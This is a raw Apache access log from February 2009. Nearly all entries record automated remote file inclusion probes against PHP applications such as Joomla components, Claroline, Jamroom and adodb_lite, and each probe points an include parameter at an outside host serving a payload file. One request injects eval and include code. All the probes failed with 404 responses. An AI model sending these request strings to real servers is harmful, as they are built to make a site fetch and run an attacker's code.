85.204.231.202 - - [05/Feb/2009:01:31:23 -0600] "GET /logs/access_log.1213660800//phphtml.php?htmlclass_path=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
85.204.231.202 - - [05/Feb/2009:01:31:24 -0600] "GET //phphtml.php?htmlclass_path=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
85.204.231.202 - - [05/Feb/2009:01:31:24 -0600] "GET /logs//phphtml.php?htmlclass_path=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
87.101.4.49 - - [05/Feb/2009:01:31:47 -0600] "GET /logs/access_log.1214524800//include/write.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
66.71.191.223 - - [05/Feb/2009:01:32:33 -0600] "GET /logs/access_log.1219968000//xfsection/modify.php?dir_module=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
66.71.191.223 - - [05/Feb/2009:01:32:36 -0600] "GET /logs/access_log.1219968000//xfsection/modify.php?dir_module=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
66.71.191.223 - - [05/Feb/2009:01:32:59 -0600] "GET /logs/access_log.1220745600//xfsection/modify.php?dir_module=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
66.71.191.223 - - [05/Feb/2009:01:32:59 -0600] "GET /logs/access_log.1220745600//xfsection/modify.php?dir_module=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
200.123.132.173 - - [05/Feb/2009:01:33:07 -0600] "GET /logs//index.php?DOCUMENT_ROOT=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
200.123.132.173 - - [05/Feb/2009:01:33:08 -0600] "GET /logs/access_log.1216684800//index.php?DOCUMENT_ROOT=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
200.123.132.173 - - [05/Feb/2009:01:33:08 -0600] "GET //index.php?DOCUMENT_ROOT=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:01:34:34 -0600] "GET //galeria.php?start=0&kategoria=http://www.geocities.com/buntingx/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:01:34:34 -0600] "GET /logs//galeria.php?start=0&kategoria=http://www.geocities.com/buntingx/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
66.71.191.223 - - [05/Feb/2009:01:35:06 -0600] "GET /logs/access_log.1219968000//modify.php?dir_module=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
66.71.191.223 - - [05/Feb/2009:01:35:23 -0600] "GET /logs/access_log.1220745600//modify.php?dir_module=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:01:36:02 -0600] "GET /logs//include/write.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:01:36:02 -0600] "GET //include/write.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
87.106.187.105 - - [05/Feb/2009:01:36:17 -0600] "GET /logs/access_log.1216512000//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
87.106.187.105 - - [05/Feb/2009:01:36:18 -0600] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
87.106.187.105 - - [05/Feb/2009:01:36:18 -0600] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
83.222.23.232 - - [05/Feb/2009:01:36:29 -0600] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/society.crew/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
83.222.23.232 - - [05/Feb/2009:01:36:29 -0600] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/society.crew/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
87.106.187.105 - - [05/Feb/2009:01:36:56 -0600] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
87.101.4.49 - - [05/Feb/2009:01:37:23 -0600] "GET /logs//include/write.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:01:37:23 -0600] "GET //include/write.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
65.55.208.131 - - [05/Feb/2009:01:37:37 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [05/Feb/2009:01:37:37 -0600] "GET /logs/access_log.1180915200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
85.204.231.202 - - [05/Feb/2009:01:37:52 -0600] "GET /logs/access_log.1216944000//phphtml.php?htmlclass_path=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
222.231.47.130 - - [05/Feb/2009:01:38:06 -0600] "GET /logs/access_log.1217203200//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 363 "-""libwww-perl/5.79"
222.231.47.130 - - [05/Feb/2009:01:38:06 -0600] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
222.231.47.130 - - [05/Feb/2009:01:38:07 -0600] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
193.140.245.7 - - [05/Feb/2009:01:39:15 -0600] "GET /e404.php?DOCUMENT_ROOT=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:01:39:18 -0600] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/buntingx/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:01:39:18 -0600] "GET /logs/access_log.1219017600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/buntingx/id.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:01:39:19 -0600] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/buntingx/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
209.172.33.230 - - [05/Feb/2009:01:41:44 -0600] "GET /logs/access_log.1218758400/errors.php?error=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
209.172.33.230 - - [05/Feb/2009:01:41:44 -0600] "GET /errors.php?error=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
209.172.33.230 - - [05/Feb/2009:01:41:44 -0600] "GET /logs/errors.php?error=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
209.172.33.230 - - [05/Feb/2009:01:41:55 -0600] "GET /logs/access_log.1213747200/errors.php?error=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
88.191.95.106 - - [05/Feb/2009:01:42:47 -0600] "GET /logs/index.php?go=http://gumansin.com/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:01:42:47 -0600] "GET /logs/access_log.1218758400%20%20/index.php?go=http://gumansin.com/id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:01:42:47 -0600] "GET /index.php?go=http://gumansin.com/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
65.98.28.210 - - [05/Feb/2009:01:46:14 -0600] "GET /logs/access_log.1218758400/errors.php?error=http://iam.skocap.net/Scan2/id.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
65.98.28.210 - - [05/Feb/2009:01:46:14 -0600] "GET /errors.php?error=http://iam.skocap.net/Scan2/id.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
65.98.28.210 - - [05/Feb/2009:01:46:14 -0600] "GET /logs/errors.php?error=http://iam.skocap.net/Scan2/id.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
65.98.28.210 - - [05/Feb/2009:01:46:23 -0600] "GET /logs/access_log.1213747200/errors.php?error=http://iam.skocap.net/Scan2/id.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
193.140.245.7 - - [05/Feb/2009:01:48:01 -0600] "GET /logs/access_log.1218758400/e404.php?DOCUMENT_ROOT=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
193.140.245.7 - - [05/Feb/2009:01:48:02 -0600] "GET /e404.php?DOCUMENT_ROOT=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
193.140.245.7 - - [05/Feb/2009:01:48:02 -0600] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
80.25.82.126 - - [05/Feb/2009:01:49:48 -0600] "GET /logs/access_log.1212451200//claroline/phpbb/page_tail.php?includePath=http://canalteresina.org/TT?? HTTP/1.1" 404 341 "-""libwww-perl/5.76"
80.25.82.126 - - [05/Feb/2009:01:49:49 -0600] "GET //claroline/phpbb/page_tail.php?includePath=http://canalteresina.org/TT?? HTTP/1.1" 404 314 "-""libwww-perl/5.76"
80.25.82.126 - - [05/Feb/2009:01:49:49 -0600] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://canalteresina.org/TT?? HTTP/1.1" 404 319 "-""libwww-perl/5.76"
195.5.163.212 - - [05/Feb/2009:01:50:01 -0600] "GET /logs/access_log.1218758400//frame.php?framefile=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
195.5.163.212 - - [05/Feb/2009:01:50:01 -0600] "GET //frame.php?framefile=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.5.163.212 - - [05/Feb/2009:01:50:02 -0600] "GET /logs//frame.php?framefile=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.44.52.78 - - [05/Feb/2009:01:51:02 -0600] "GET /logs/errors.php?error=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
202.44.52.78 - - [05/Feb/2009:01:51:02 -0600] "GET /logs/access_log.1218758400/errors.php?error=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
202.44.52.78 - - [05/Feb/2009:01:51:02 -0600] "GET /errors.php?error=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
87.106.187.105 - - [05/Feb/2009:01:51:16 -0600] "GET /logs/access_log.1215216000//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
195.5.163.212 - - [05/Feb/2009:01:51:33 -0600] "GET /logs/access_log.1216944000//frame.php?framefile=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
202.44.52.78 - - [05/Feb/2009:01:51:45 -0600] "GET /logs/access_log.1213747200/errors.php?error=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
65.55.208.131 - - [05/Feb/2009:01:52:08 -0600] "GET /logs/access_log.1220054400 HTTP/1.1" 200 1146880 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
80.25.82.126 - - [05/Feb/2009:01:53:50 -0600] "GET /logs/access_log.1220659200//claroline/phpbb/page_tail.php?includePath=http://canalteresina.org/TT?? HTTP/1.1" 404 341 "-""libwww-perl/5.76"
114.108.140.37 - - [05/Feb/2009:01:56:03 -0600] "GET /logs/access_log.1218067200//poll/poll_ssi.php?include_path=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
114.108.140.37 - - [05/Feb/2009:01:56:04 -0600] "GET //poll/poll_ssi.php?include_path=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
114.108.140.37 - - [05/Feb/2009:01:56:04 -0600] "GET /logs//poll/poll_ssi.php?include_path=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
114.108.140.37 - - [05/Feb/2009:01:56:06 -0600] "GET /logs/access_log.1218067200//poll/poll_ssi.php?include_path=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
114.108.140.37 - - [05/Feb/2009:01:56:06 -0600] "GET //poll/poll_ssi.php?include_path=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
85.204.231.202 - - [05/Feb/2009:01:56:06 -0600] "GET /logs/access_log.1217116800//s_loadenv.inc.php?DOCUMENT_ROOT=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
85.204.231.202 - - [05/Feb/2009:01:56:07 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
114.108.140.37 - - [05/Feb/2009:01:56:07 -0600] "GET /logs//poll/poll_ssi.php?include_path=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
85.204.231.202 - - [05/Feb/2009:01:56:07 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
85.204.231.202 - - [05/Feb/2009:01:58:28 -0600] "GET /logs/access_log.1218153600//s_loadenv.inc.php?DOCUMENT_ROOT=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
216.22.26.95 - - [05/Feb/2009:01:59:55 -0600] "GET /logs/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 305 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:55 -0600] "GET /logs/access_log.1212278400/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:55 -0600] "GET /logs/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 305 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:55 -0600] "GET /logs/access_log.1212278400/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:55 -0600] "GET /joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:55 -0600] "GET /joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:55 -0600] "GET /joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:55 -0600] "GET /logs/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 305 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:55 -0600] "GET /logs/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 305 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:55 -0600] "GET /logs/access_log.1213142400/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:55 -0600] "GET /joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:55 -0600] "GET /logs/access_log.1213142400%20%20/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:56 -0600] "GET /logs/access_log.1212278400%20%20/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:56 -0600] "GET /logs/access_log.1212278400/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:57 -0600] "GET /logs/access_log.1213142400/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:57 -0600] "GET /logs/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 305 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:57 -0600] "GET /joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:57 -0600] "GET /joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:57 -0600] "GET /logs/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 305 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:57 -0600] "GET /logs/access_log.1213142400%20%20/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:57 -0600] "GET /logs/access_log.1212278400/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:57 -0600] "GET /logs/access_log.1212278400%20%20/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:58 -0600] "GET /joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:58 -0600] "GET /logs/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 305 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:58 -0600] "GET /logs/access_log.1212796800/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:58 -0600] "GET /logs/access_log.1212624000/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:01:59:59 -0600] "GET /logs/access_log.1214524800/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:00:00 -0600] "GET /logs/access_log.1214524800/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:00:00 -0600] "GET /joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:00:00 -0600] "GET /logs/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 305 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:00:01 -0600] "GET /logs/access_log.1212796800/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:00:01 -0600] "GET /logs/access_log.1212624000/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:00:01 -0600] "GET /joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:00:01 -0600] "GET /logs/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 305 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:00:01 -0600] "GET /logs/access_log.1212796800/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:00:02 -0600] "GET /joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:00:02 -0600] "GET /logs/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 305 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:00:02 -0600] "GET /logs/access_log.1212796800/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:00:05 -0600] "GET /logs/access_log.1212624000/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:00:07 -0600] "GET /logs/access_log.1212624000/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:00:58 -0600] "GET /joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:00:58 -0600] "GET /logs/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 305 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:00:59 -0600] "GET /logs/access_log.1213142400%20%20/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:00:59 -0600] "GET /logs/access_log.1212278400%20%20/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:01:02 -0600] "GET /joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:01:02 -0600] "GET /logs/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 305 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:01:02 -0600] "GET /logs/access_log.1213142400/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:01:02 -0600] "GET /logs/access_log.1212278400/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
77.232.66.107 - - [05/Feb/2009:02:01:13 -0600] "GET /logs/access_log.1218758400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfx.txt????%0D? HTTP/1.1" 404 351 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
77.232.66.107 - - [05/Feb/2009:02:01:13 -0600] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfx.txt????%0D? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
77.232.66.107 - - [05/Feb/2009:02:01:13 -0600] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfx.txt????%0D? HTTP/1.1" 404 324 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
195.5.163.212 - - [05/Feb/2009:02:01:18 -0600] "GET //poll/poll_ssi.php?include_path=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
216.22.26.95 - - [05/Feb/2009:02:01:27 -0600] "GET /logs/access_log.1213142400%20%20/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:01:27 -0600] "GET /logs/access_log.1212278400%20%20/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
114.108.140.37 - - [05/Feb/2009:02:04:02 -0600] "GET /logs/access_log.1218412800//poll/poll_ssi.php?include_path=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
114.108.140.37 - - [05/Feb/2009:02:04:03 -0600] "GET /logs/access_log.1218412800//poll/poll_ssi.php?include_path=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
216.22.26.95 - - [05/Feb/2009:02:04:58 -0600] "GET /logs/access_log.1213142400/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
